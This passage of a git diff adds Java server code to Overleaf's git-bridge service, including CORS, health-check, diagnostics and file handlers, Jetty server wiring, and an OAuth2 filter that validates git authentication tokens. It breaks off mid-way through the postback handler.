mode 100644 index 0000000..8d479ee --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/io/http/ning/NingHttpClient.java @@ -0,0 +1,67 @@ +package uk.ac.ic.wlgitbridge.io.http.ning; + +import io.netty.handler.codec.http.HttpHeaders; +import java.io.ByteArrayOutputStream; +import java.io.IOException; +import java.util.concurrent.ExecutionException; +import org.asynchttpclient.*; +import org.slf4j.Logger; +import org.slf4j.LoggerFactory; +import uk.ac.ic.wlgitbridge.util.FunctionT; + +public class NingHttpClient implements NingHttpClientFacade { + + private static final Logger log = LoggerFactory.getLogger(NingHttpClient.class); + + private final AsyncHttpClient http; + + public NingHttpClient(AsyncHttpClient http) { + this.http = http; + } + + @Override + public <E extends Exception> byte[] get(String url, FunctionT<HttpHeaders, Boolean, E> handler) + throws ExecutionException { + try { + return http.prepareGet(url) + .execute( + new AsyncCompletionHandler<byte[]>() { + + ByteArrayOutputStream bytes = new ByteArrayOutputStream(); + + @Override + public State onHeadersReceived(HttpHeaders headers) throws E { + return handler.apply(headers) ? State.CONTINUE : State.ABORT; + } + + @Override + public State onBodyPartReceived(HttpResponseBodyPart content) throws IOException { + bytes.write(content.getBodyPartBytes()); + return State.CONTINUE; + } + + @Override + public byte[] onCompleted(Response response) throws Exception { + int statusCode = response.getStatusCode(); + if (statusCode >= 400) { + throw new Exception("got status " + statusCode + " fetching " + url); + } + byte[] ret = bytes.toByteArray(); + bytes.close(); + log.debug( + statusCode + + " " + + response.getStatusText() + + " (" + + ret.length + + "B) -> " + + url); + return ret; + } + }) + .get(); + } catch (InterruptedException e) { + throw new RuntimeException(e); + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/io/http/ning/NingHttpClientFacade.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/io/http/ning/NingHttpClientFacade.java new file mode 100644 index 0000000..97616c0 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/io/http/ning/NingHttpClientFacade.java @@ -0,0 +1,18 @@ +package uk.ac.ic.wlgitbridge.io.http.ning; + +import io.netty.handler.codec.http.HttpHeaders; +import java.util.concurrent.ExecutionException; +import uk.ac.ic.wlgitbridge.util.FunctionT; + +public interface NingHttpClientFacade { + + /* + * Performs a GET request + * @param url the target URL + * @param handler handler for the response headers. Returning false + * aborts the request. + * @return + */ + <E extends Exception> byte[] get(String url, FunctionT<HttpHeaders, Boolean, E> handler) + throws ExecutionException; +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/BasicAuthCredentials.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/BasicAuthCredentials.java new file mode 100644 index 0000000..15827a8 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/BasicAuthCredentials.java @@ -0,0 +1,20 @@ +package uk.ac.ic.wlgitbridge.server; + +public class BasicAuthCredentials { + + private String username; + private String password; + + public BasicAuthCredentials(String username, String password) { + this.username = username; + this.password = password; + } + + public String getUsername() { + return username; + } + + public String getPassword() { + return password; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/CORSHandler.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/CORSHandler.java new file mode 100644 index 0000000..10d978c --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/CORSHandler.java @@ -0,0 +1,47 @@ +package uk.ac.ic.wlgitbridge.server; + +import java.io.IOException; +import java.util.Set; +import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; +import org.eclipse.jetty.server.Request; +import org.eclipse.jetty.server.handler.AbstractHandler; +import uk.ac.ic.wlgitbridge.util.Log; + +public class CORSHandler extends AbstractHandler { + private final Set<String> allowedCorsOrigins; + + public CORSHandler(String[] allowedCorsOrigins) { + this.allowedCorsOrigins = Set.of(allowedCorsOrigins); + } + + @Override + public void handle( + String target, Request baseRequest, HttpServletRequest request, HttpServletResponse response) + throws IOException { + + String origin = request.getHeader("Origin"); + if (origin == null) { + return; // Not a CORS request + } + + final boolean ok = allowedCorsOrigins.contains(origin); + if (ok) { + response.setHeader("Access-Control-Allow-Origin", origin); + response.setHeader("Access-Control-Allow-Credentials", "true"); + response.setHeader("Access-Control-Allow-Methods", "GET, HEAD, PUT, POST, DELETE"); + response.setHeader("Access-Control-Allow-Headers", "Authorization, Content-Type"); + response.setHeader("Access-Control-Max-Age", "86400"); // cache for 24h + } + String method = baseRequest.getMethod(); + if ("OPTIONS".equals(method)) { + Log.debug("OPTIONS <- {}", target); + baseRequest.setHandled(true); + if (ok) { + response.setStatus(200); + } else { + response.setStatus(403); + } + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/DiagnosticsHandler.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/DiagnosticsHandler.java new file mode 100644 index 0000000..064cae7 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/DiagnosticsHandler.java @@ -0,0 +1,59 @@ +package uk.ac.ic.wlgitbridge.server; + +import java.io.IOException; +import java.lang.management.ManagementFactory; +import javax.management.JMException; +import javax.management.ObjectName; +import javax.servlet.ServletException; +import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; +import org.eclipse.jetty.server.Request; +import org.eclipse.jetty.server.handler.AbstractHandler; +import uk.ac.ic.wlgitbridge.util.Log; + +public class DiagnosticsHandler extends AbstractHandler { + + public DiagnosticsHandler() {} + + @Override + public void handle( + String target, Request baseRequest, HttpServletRequest request, HttpServletResponse response) + throws IOException, ServletException { + String method = baseRequest.getMethod(); + if (("GET".equals(method)) && target != null && target.matches("^/diags/?$")) { + baseRequest.setHandled(true); + + Log.debug(method + " <- /diags"); + + String detail; + String summary; + + try { + detail = execute("vmNativeMemory", "detail"); + summary = execute("vmNativeMemory", "summary"); + } catch (JMException e) { + Log.error("Failed to get native memory detail: " + e.getMessage()); + response.setStatus(500); + return; + } + + response.setContentType("text/plain"); + response.setStatus(200); + + response.getWriter().write(summary); + response.getWriter().write("\n----------\n\n"); + response.getWriter().write(detail); + response.getWriter().flush(); + } + } + + public static String execute(String command, String... args) throws JMException { + return (String) + ManagementFactory.getPlatformMBeanServer() + .invoke( + new ObjectName("com.sun.management:type=DiagnosticCommand"), + command, + new Object[] {args}, + new String[] {"[Ljava.lang.String;"}); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/FileHandler.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/FileHandler.java new file mode 100644 index 0000000..20a3c94 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/FileHandler.java @@ -0,0 +1,54 @@ +package uk.ac.ic.wlgitbridge.server; + +import java.io.IOException; +import java.util.regex.Matcher; +import java.util.regex.Pattern; +import javax.servlet.ServletException; +import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; +import org.eclipse.jetty.server.Request; +import org.eclipse.jetty.server.handler.ResourceHandler; +import org.slf4j.Logger; +import org.slf4j.LoggerFactory; +import uk.ac.ic.wlgitbridge.bridge.Bridge; +import uk.ac.ic.wlgitbridge.snapshot.push.exception.InvalidPostbackKeyException; + +/* + * Serve files referenced by the snapshot that we send to the Overleaf API. + * + * Requests must include the postback key. + */ +public class FileHandler extends ResourceHandler { + private static final Logger LOG = LoggerFactory.getLogger(FileHandler.class); + + private final Bridge bridge; + private final Pattern DOC_KEY_PATTERN = Pattern.compile("^/(\\w+)/.+$"); + + public FileHandler(Bridge bridge) { + this.bridge = bridge; + } + + @Override + public void handle( + String target, Request baseRequest, HttpServletRequest request, HttpServletResponse response) + throws IOException, ServletException { + if (!"GET".equals(baseRequest.getMethod())) return; + LOG.debug("GET <- {}", baseRequest.getRequestURI()); + + Matcher docKeyMatcher = DOC_KEY_PATTERN.matcher(target); + if (!docKeyMatcher.matches()) return; + String docKey = docKeyMatcher.group(1); + + String apiKey = request.getParameter("key"); + if (apiKey == null) return; + + try { + bridge.checkPostbackKey(docKey, apiKey); + } catch (InvalidPostbackKeyException e) { + LOG.warn("INVALID POST BACK KEY: docKey={} apiKey={}", docKey, apiKey); + return; + } + + super.handle(target, baseRequest, request, response); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/GitBridgeServer.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/GitBridgeServer.java new file mode 100644 index 0000000..57d1b34 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/GitBridgeServer.java @@ -0,0 +1,173 @@ +package uk.ac.ic.wlgitbridge.server; + +import java.io.File; +import java.net.BindException; +import java.nio.file.Paths; +import java.util.EnumSet; +import javax.servlet.DispatcherType; +import javax.servlet.Filter; +import javax.servlet.ServletException; +import org.eclipse.jetty.server.Handler; +import org.eclipse.jetty.server.Server; +import org.eclipse.jetty.server.ServerConnector; +import org.eclipse.jetty.server.handler.*; +import org.eclipse.jetty.servlet.FilterHolder; +import org.eclipse.jetty.servlet.ServletContextHandler; +import org.eclipse.jetty.servlet.ServletHolder; +import uk.ac.ic.wlgitbridge.application.config.Config; +import uk.ac.ic.wlgitbridge.application.jetty.NullLogger; +import uk.ac.ic.wlgitbridge.bridge.Bridge; +import uk.ac.ic.wlgitbridge.bridge.db.DBStore; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SqliteDBStore; +import uk.ac.ic.wlgitbridge.bridge.repo.FSGitRepoStore; +import uk.ac.ic.wlgitbridge.bridge.repo.RepoStore; +import uk.ac.ic.wlgitbridge.bridge.repo.RepoStoreConfig; +import uk.ac.ic.wlgitbridge.bridge.snapshot.NetSnapshotApi; +import uk.ac.ic.wlgitbridge.bridge.snapshot.SnapshotApi; +import uk.ac.ic.wlgitbridge.bridge.swap.store.SwapStore; +import uk.ac.ic.wlgitbridge.git.servlet.WLGitServlet; +import uk.ac.ic.wlgitbridge.snapshot.base.SnapshotAPIRequest; +import uk.ac.ic.wlgitbridge.util.Log; +import uk.ac.ic.wlgitbridge.util.Util; + +/* + * Created by Winston on 02/11/14. + */ + +/* + * Class for the actual server. + */ +public class GitBridgeServer { + + private final Bridge bridge; + + private final Server jettyServer; + + private final int port; + private String rootGitDirectoryPath; + private String apiBaseURL; + + public GitBridgeServer(Config config) throws ServletException { + org.eclipse.jetty.util.log.Log.setLog(new NullLogger()); + this.port = config.getPort(); + this.rootGitDirectoryPath = config.getRootGitDirectory(); + RepoStore repoStore = + new FSGitRepoStore( + rootGitDirectoryPath, config.getRepoStore().flatMap(RepoStoreConfig::getMaxFileSize)); + DBStore dbStore = + new SqliteDBStore( + Paths.get(repoStore.getRootDirectory().getAbsolutePath()) + .resolve(".wlgb") + .resolve("wlgb.db") + .toFile(), + config.getSqliteHeapLimitBytes()); + SwapStore swapStore = SwapStore.fromConfig(config.getSwapStore()); + SnapshotApi snapshotApi = new NetSnapshotApi(); + bridge = Bridge.make(config, repoStore, dbStore, swapStore, snapshotApi); + jettyServer = new Server(); + configureJettyServer(config, repoStore, snapshotApi); + apiBaseURL = config.getAPIBaseURL(); + SnapshotAPIRequest.setBaseURL(apiBaseURL); + Util.setServiceName(config.getServiceName()); + Util.setPostbackURL(config.getPostbackURL()); + Util.setPort(config.getPort()); + } + + /* + * Starts the server on the port given on construction. + */ + public void start() { + try { + bridge.checkDB(); + jettyServer.start(); + bridge.startBackgroundJobs(); + Log.info(Util.getServiceName() + "-Git Bridge server started"); + Log.info("Listening on port: " + port); + Log.info("Bridged to: " + apiBaseURL); + Log.info("Postback base URL: " + Util.getPostbackURL()); + Log.info("Root git directory path: " + rootGitDirectoryPath); + } catch (BindException e) { + Log.error("Failed to bind Jetty", e); + } catch (Exception e) { + Log.error("Failed to start Jetty", e); + } + } + + public void stop() { + try { + jettyServer.stop(); + } catch (Exception e) { + Log.error("Failed to stop Jetty", e); + } + } + + private void configureJettyServer(Config config, RepoStore repoStore, SnapshotApi snapshotApi) + throws ServletException { + ServerConnector connector = new ServerConnector(this.jettyServer); + connector.setPort(config.getPort()); + connector.setHost(config.getBindIp()); + connector.setIdleTimeout(config.getIdleTimeout()); + this.jettyServer.addConnector(connector); + + HandlerCollection handlers = new HandlerList(); + handlers.addHandler(new CORSHandler(config.getAllowedCorsOrigins())); + handlers.addHandler(initApiHandler()); + handlers.addHandler(initBaseHandler()); + handlers.addHandler(initGitHandler(config, repoStore, snapshotApi)); + jettyServer.setHandler(handlers); + } + + private Handler initBaseHandler() { + ContextHandler base = new ContextHandler(); + base.setContextPath("/"); + HandlerCollection handlers = new HandlerList(); + handlers.addHandler(new StatusHandler(bridge)); + handlers.addHandler(new HealthCheckHandler(bridge)); + handlers.addHandler(new GitLfsHandler(bridge)); + handlers.addHandler(new PrometheusHandler()); + handlers.addHandler(new DiagnosticsHandler()); + base.setHandler(handlers); + return base; + } + + private Handler initApiHandler() { + ContextHandler api = new ContextHandler(); + api.setContextPath("/api"); + + HandlerCollection handlers = new HandlerList(); + handlers.addHandler(initResourceHandler()); + handlers.addHandler(new PostbackHandler(bridge)); + handlers.addHandler(new ProjectDeletionHandler(bridge)); + handlers.addHandler(new DefaultHandler()); + + api.setHandler(handlers); + + ProductionErrorHandler errorHandler = new ProductionErrorHandler(); + api.setErrorHandler(errorHandler); + return api; + } + + private Handler initGitHandler(Config config, RepoStore repoStore, SnapshotApi snapshotApi) + throws ServletException { + final ServletContextHandler servletContextHandler = + new ServletContextHandler(ServletContextHandler.SESSIONS); + if (config.getOauth2Server() != null) { + Filter filter = + new Oauth2Filter(snapshotApi, config.getOauth2Server(), config.isUserPasswordEnabled()); + servletContextHandler.addFilter( + new FilterHolder(filter), "/*", EnumSet.of(DispatcherType.REQUEST)); + } + servletContextHandler.setContextPath("/"); + servletContextHandler.addServlet( + new ServletHolder(new WLGitServlet(servletContextHandler, repoStore, bridge)), "/*"); + ProductionErrorHandler errorHandler = new ProductionErrorHandler(); + servletContextHandler.setErrorHandler(errorHandler); + return servletContextHandler; + } + + private Handler initResourceHandler() { + ResourceHandler resourceHandler = new FileHandler(bridge); + resourceHandler.setResourceBase(new File(rootGitDirectoryPath, ".wlgb/atts").getAbsolutePath()); + return resourceHandler; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/GitLfsHandler.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/GitLfsHandler.java new file mode 100644 index 0000000..67ab2b3 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/GitLfsHandler.java @@ -0,0 +1,36 @@ +package uk.ac.ic.wlgitbridge.server; + +import java.io.IOException; +import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; +import org.eclipse.jetty.server.Request; +import org.eclipse.jetty.server.handler.AbstractHandler; +import uk.ac.ic.wlgitbridge.bridge.Bridge; +import uk.ac.ic.wlgitbridge.util.Log; + +public class GitLfsHandler extends AbstractHandler { + + private final Bridge bridge; + + public GitLfsHandler(Bridge bridge) { + this.bridge = bridge; + } + + @Override + public void handle( + String target, Request baseRequest, HttpServletRequest request, HttpServletResponse response) + throws IOException { + String method = baseRequest.getMethod(); + if (("POST".equals(method)) + && target != null + && target.matches("^/[0-9a-z]+\\.git/info/lfs/objects/batch/?$")) { + Log.debug(method + " <- /<project>.git/info/lfs/objects/batch"); + response.setContentType("application/vnd.git-lfs+json"); + response.setStatus(422); + response + .getWriter() + .println("{\"message\": \"ERROR: Git LFS is not supported on Overleaf\"}"); + baseRequest.setHandled(true); + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/HealthCheckHandler.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/HealthCheckHandler.java new file mode 100644 index 0000000..fe2ad43 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/HealthCheckHandler.java @@ -0,0 +1,39 @@ +package uk.ac.ic.wlgitbridge.server; + +import java.io.IOException; +import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; +import org.eclipse.jetty.server.Request; +import org.eclipse.jetty.server.handler.AbstractHandler; +import uk.ac.ic.wlgitbridge.bridge.Bridge; +import uk.ac.ic.wlgitbridge.util.Log; + +public class HealthCheckHandler extends AbstractHandler { + + private final Bridge bridge; + + public HealthCheckHandler(Bridge bridge) { + this.bridge = bridge; + } + + @Override + public void handle( + String target, Request baseRequest, HttpServletRequest request, HttpServletResponse response) + throws IOException { + String method = baseRequest.getMethod(); + if (("GET".equals(method) || "HEAD".equals(method)) + && target != null + && target.matches("^/health_check/?$")) { + Log.debug(method + " <- /health_check"); + baseRequest.setHandled(true); + response.setContentType("text/plain"); + if (bridge.healthCheck()) { + response.setStatus(200); + response.getWriter().println("ok"); + } else { + response.setStatus(500); + response.getWriter().println("failed"); + } + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/Oauth2Filter.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/Oauth2Filter.java new file mode 100644 index 0000000..586a21a --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/Oauth2Filter.java @@ -0,0 +1,332 @@ +package uk.ac.ic.wlgitbridge.server; + +import com.google.api.client.auth.oauth2.*; +import com.google.api.client.http.GenericUrl; +import com.google.api.client.http.HttpHeaders; +import com.google.api.client.http.HttpRequest; +import com.google.api.client.http.HttpResponse; +import java.io.IOException; +import java.io.PrintWriter; +import java.io.UnsupportedEncodingException; +import java.util.*; +import javax.servlet.*; +import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; +import org.apache.commons.codec.binary.Base64; +import uk.ac.ic.wlgitbridge.bridge.snapshot.SnapshotApi; +import uk.ac.ic.wlgitbridge.util.Instance; +import uk.ac.ic.wlgitbridge.util.Log; +import uk.ac.ic.wlgitbridge.util.Util; + +/* + * Created by winston on 25/10/15. + */ +public class Oauth2Filter implements Filter { + + public static final String ATTRIBUTE_KEY = "oauth2"; + + private final SnapshotApi snapshotApi; + + private final String oauth2Server; + + private final boolean isUserPasswordEnabled; + + public Oauth2Filter(SnapshotApi snapshotApi, String oauth2Server, boolean isUserPasswordEnabled) { + this.snapshotApi = snapshotApi; + this.oauth2Server = oauth2Server; + this.isUserPasswordEnabled = isUserPasswordEnabled; + } + + @Override + public void init(FilterConfig filterConfig) {} + + /* + * The original request from git will not contain the Authorization header. + * + * So, for projects that need auth, we return 401. Git will swallow this + * and prompt the user for user/pass, and then make a brand new request. + * + * @param servletRequest + * + * @param servletResponse + * + * @param filterChain + * + * @throws IOException + * + * @throws ServletException + */ + @Override + public void doFilter( + ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) + throws IOException, ServletException { + HttpServletRequest request = (HttpServletRequest) servletRequest; + HttpServletResponse response = (HttpServletResponse) servletResponse; + String requestUri = request.getRequestURI(); + + if (requestUri.startsWith("/project")) { + Log.info("[{}] Invalid request URI", requestUri); + sendResponse( + response, 404, Arrays.asList("Invalid Project ID (must not have a '/project' prefix)")); + return; + } + + String projectId = Util.removeAllSuffixes(requestUri.split("/")[1], ".git"); + + BasicAuthCredentials basicAuthCreds = getBasicAuthCredentials(request); + if (basicAuthCreds == null) { + handleNeedAuthorization(projectId, "(unknown)", request, response); + return; + } + String username = basicAuthCreds.getUsername(); + String password = basicAuthCreds.getPassword(); + + if (isLinkSharingId(projectId)) { + handleLinkSharingId(projectId, username, request, response); + return; + } + if (!isProjectId(projectId)) { + handleBadProjectId(projectId, username, request, response); + return; + } + + final Credential cred = + new Credential.Builder(BearerToken.authorizationHeaderAccessMethod()).build(); + + if (username.equals("git")) { + Log.debug("[{}] username is 'git', skipping password grant flow", projectId); + + // Check that the access token is valid. In principle, we could + // wait until we make the actual request to the web api, but the + // JGit API doesn't make it easy to reply with a 401 and a custom + // error message. This is something we can do in this filter, so as + // a workaround, we use the /oauth/token/info endpoint to verify + // the access token. + // + // It's still theoretically possible for the web api request to + // fail later (for example, in the unlikely event that the token + // expired between the two requests). In that case, JGit will + // return a 401 without a custom error message. + int statusCode = checkAccessToken(this.oauth2Server, password, getClientIp(request)); + if (statusCode == 429) { + handleRateLimit(projectId, username, request, response); + return; + } else if (statusCode == 401) { + handleBadAccessToken(projectId, request, response); + return; + } else if (statusCode >= 400) { + handleUnknownOauthServerError(projectId, statusCode, request, response); + return; + } + cred.setAccessToken(password); + } else if (this.isUserPasswordEnabled) { + // password auth has been deprecated for git-bridge + handlePasswordAuthenticationDeprecation(projectId, username, request, response); + return; + } else { + handleNeedAuthorization(projectId, username, request, response); + return; + } + + servletRequest.setAttribute(ATTRIBUTE_KEY, cred); + filterChain.doFilter(servletRequest, servletResponse); + } + + @Override + public void destroy() {} + + private boolean isLinkSharingId(String projectId) { + return projectId.matches("^[0-9]+[bcdfghjklmnpqrstvwxyz]{6,12}$"); + } + + private boolean isProjectId(String projectId) { + return projectId.matches("^[0-9a-f]{24}$"); + } + + private void sendResponse(HttpServletResponse response, int code, List<String> lines) + throws IOException { + response.setContentType("text/plain"); + response.setStatus(code); + PrintWriter w = response.getWriter(); + for (String line : lines) { + w.println(line); + } + w.close(); + } + + private void handleLinkSharingId( + String projectId, String username, HttpServletRequest request, HttpServletResponse response) + throws IOException { + Log.info("[{}] Bad project id, User '{}' ip={}", projectId, username, getClientIp(request)); + sendResponse( + response, + 404, + Arrays.asList( + "Git access via link sharing link is not supported.", + "", + "You can find the project's git remote url by opening it in your browser", + "and selecting Git from the left sidebar in the project view.", + "", + "If this is unexpected, please contact us at support@overleaf.com, or", + "see https://www.overleaf.com/learn/how-to/Git_integration for more information.")); + } + + private void handleBadProjectId( + String projectId, String username, HttpServletRequest request, HttpServletResponse response) + throws IOException { + Log.info("[{}] Bad project id, User '{}' ip={}", projectId, username, getClientIp(request)); + sendResponse( + response, + 404, + Arrays.asList( + "This Overleaf project does not exist.", + "", + "If this is unexpected, please contact us at support@overleaf.com, or", + "see https://www.overleaf.com/learn/how-to/Git_integration for more information.")); + } + + private void handleRateLimit( + String projectId, String username, HttpServletRequest request, HttpServletResponse response) + throws IOException { + Log.info("[{}] Rate limit, User '{}' ip={}", projectId, username, getClientIp(request)); + sendResponse( + response, 429, Arrays.asList("Rate limit exceeded. Please wait and try again later.")); + } + + private void handleNeedAuthorization( + String projectId, String username, HttpServletRequest request, HttpServletResponse response) + throws IOException { + Log.info("[{}] Unauthorized, User '{}' ip={}", projectId, username, getClientIp(request)); + response.setHeader("WWW-Authenticate", "Basic realm=\"Git Bridge\""); + if (this.isUserPasswordEnabled) { + sendResponse( + response, + 401, + Arrays.asList( + "Log in using the email address and password you use for Overleaf.", + "", + "*Note*: if you use a provider such as Google or Twitter to sign into", + "your Overleaf account, you will need to set a password.", + "", + "See our help page for more support:", + "https://www.overleaf.com/learn/how-to/Troubleshooting_git_bridge_problems")); + } else { + sendResponse( + response, + 401, + Arrays.asList( + "Log in with the username 'git' and enter your Git authentication token", + "when prompted for a password.", + "", + "You can generate and manage your Git authentication tokens in", + "your Overleaf Account Settings.")); + } + } + + private void handleBadAccessToken( + String projectId, HttpServletRequest request, HttpServletResponse response) + throws IOException { + Log.info("[{}] Bad access token, ip={}", projectId, getClientIp(request)); + sendResponse( + response, + 401, + Arrays.asList( + "Enter your Git authentication token when prompted for a password.", + "", + "You can generate and manage your Git authentication tokens in", + "your Overleaf Account Settings.")); + } + + private int checkAccessToken(String oauth2Server, String accessToken, String clientIp) + throws IOException { + GenericUrl url = new GenericUrl(oauth2Server + "/oauth/token/info?client_ip=" + clientIp); + HttpRequest request = Instance.httpRequestFactory.buildGetRequest(url); + HttpHeaders headers = new HttpHeaders(); + headers.setAuthorization("Bearer " + accessToken); + request.setHeaders(headers); + request.setThrowExceptionOnExecuteError(false); + HttpResponse response = request.execute(); + int statusCode = response.getStatusCode(); + response.disconnect(); + return statusCode; + } + + private void handleUnknownOauthServerError( + String projectId, int statusCode, HttpServletRequest request, HttpServletResponse response) + throws IOException { + Log.info( + "[{}] OAuth server error, statusCode={}, ip={}", + projectId, + statusCode, + getClientIp(request)); + sendResponse(response, 500, Arrays.asList("Unexpected server error. Please try again later.")); + } + + private void handlePasswordAuthenticationDeprecation( + String projectId, String username, HttpServletRequest request, HttpServletResponse response) + throws IOException { + if (username.contains("@")) { + Log.info("[{}] Password authentication deprecated, ip={}", projectId, getClientIp(request)); + sendResponse( + response, + 403, + Arrays.asList( + "Overleaf now only supports Git authentication tokens to access git. See: https://www.overleaf.com/learn/how-to/Git_integration_authentication_tokens")); + } else { + Log.info("[{}] Wrong git URL format, ip={}", projectId, getClientIp(request)); + sendResponse( + response, + 403, + Arrays.asList( + "Overleaf now only supports Git authentication tokens to access git. See: https://www.overleaf.com/learn/how-to/Git_integration_authentication_tokens", + "Please make sure your Git URL is correctly formatted. For example: https://git@git.overleaf.com/<YOUR_PROJECT_ID> or https://git:<AUTHENTICATION_TOKEN>@git.overleaf.com/<YOUR_PROJECT_ID>")); + } + } + + /* + * Gets the remote IP from the request. + */ + private String getClientIp(HttpServletRequest request) { + String clientIp = request.getHeader("X-Forwarded-For"); + if (clientIp == null) { + clientIp = request.getRemoteAddr(); + } + return clientIp; + } + + /* + * Extract basic auth credentials from the request. + * + * Returns null if valid basic auth credentials couldn't be found. + */ + private BasicAuthCredentials getBasicAuthCredentials(HttpServletRequest request) { + String authHeader = request.getHeader("Authorization"); + if (authHeader == null) { + return null; + } + + StringTokenizer st = new StringTokenizer(authHeader); + if (!st.hasMoreTokens()) { + return null; + } + String basic = st.nextToken(); + if (!basic.equalsIgnoreCase("Basic")) { + return null; + } + + String credentials = null; + try { + credentials = new String(Base64.decodeBase64(st.nextToken()), "UTF-8"); + } catch (UnsupportedEncodingException e) { + return null; + } + + String[] split = credentials.split(":", 2); + if (split.length != 2) { + return null; + } + String username = split[0]; + String password = split[1]; + return new BasicAuthCredentials(username, password); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/PostbackContents.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/PostbackContents.java new file mode 100644 index 0000000..f925975 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/PostbackContents.java @@ -0,0 +1,71 @@ +package uk.ac.ic.wlgitbridge.server; + +import com.google.gson.Gson; +import com.google.gson.JsonElement; +import com.google.gson.JsonObject; +import uk.ac.ic.wlgitbridge.bridge.Bridge; +import uk.ac.ic.wlgitbridge.snapshot.base.JSONSource; +import uk.ac.ic.wlgitbridge.snapshot.push.exception.SnapshotPostException; +import uk.ac.ic.wlgitbridge.snapshot.push.exception.SnapshotPostExceptionBuilder; +import uk.ac.ic.wlgitbridge.snapshot.push.exception.UnexpectedPostbackException; +import uk.ac.ic.wlgitbridge.util.Util; + +/* + * Created by Winston on 17/11/14. + */ +public class PostbackContents implements JSONSource { + + private static final String CODE_SUCCESS = "upToDate"; + + private final Bridge bridge; + private final String projectName; + private final String postbackKey; + + private final SnapshotPostExceptionBuilder snapshotPostExceptionBuilder; + + private int versionID; + private SnapshotPostException exception; + + public PostbackContents(Bridge bridge, String projectName, String postbackKey, String contents) { + this.bridge = bridge; + this.projectName = projectName; + this.postbackKey = postbackKey; + snapshotPostExceptionBuilder = new SnapshotPostExceptionBuilder(); + fromJSON(new Gson().fromJson(contents, JsonElement.class)); + } + + @Override + public void fromJSON(JsonElement json) { + JsonObject responseObject = json.getAsJsonObject(); + String code = Util.getCodeFromResponse(responseObject); + setResult(responseObject, code); + } + + public void processPostback() throws UnexpectedPostbackException { + if (exception == null) { + bridge.postbackReceivedSuccessfully(projectName, postbackKey, versionID); + } else { + bridge.postbackReceivedWithException(projectName, postbackKey, exception); + } + } + + private void setResult(JsonObject responseObject, String code) { + if (code.equals(CODE_SUCCESS)) { + setVersionID(responseObject); + } else { + setException(responseObject, code); + } + } + + private void setVersionID(JsonObject responseObject) { + versionID = responseObject.get("latestVerId").getAsInt(); + } + + private void setException(JsonObject responseObject, String code) { + try { + exception = snapshotPostExceptionBuilder.build(code, responseObject); + } catch (UnexpectedPostbackException e) { + throw new RuntimeException(e); + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/PostbackHandler.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/PostbackHandler.java new file mode 100644 index 0000000..a121844 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/PostbackHandler.java @@ -0,0 +1,71 @@ +package uk.ac.ic.wlgitbridge.server; + +import com.google.gson.JsonObject; +import com.google.gson.JsonPrimitive; +import java.io.IOException; +import javax.servlet.ServletException; +import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; +import org.eclipse.jetty.server.Request; +import org.eclipse.jetty.server.handler.AbstractHandler; +import uk.ac.ic.wlgitbridge.bridge.Bridge; +import uk.ac.ic.wlgitbridge.snapshot.push.exception.UnexpectedPostbackException; +import uk.ac.ic.wlgitbridge.util.Log; +import uk.ac.ic.wlgitbridge.util.Util; + +/* + * Created by Winston on 16/11/14. + */ +public class PostbackHandler extends AbstractHandler { + + private final Bridge bridge; + + public PostbackHandler(Bridge bridge) { + this.bridge = bridge; + } + + @Override + public void handle( + String target, Request baseRequest, HttpServletRequest request, HttpServletResponse response) + throws IOException, ServletException { + Log.debug("PostbackHandler: " + baseRequest.getMethod() + " <- " + baseRequest.getHttpURI()); + try { + if (request.getMethod().equals("POST") && target.endsWith("postback")) { + response.setContentType("application/json"); + String contents = 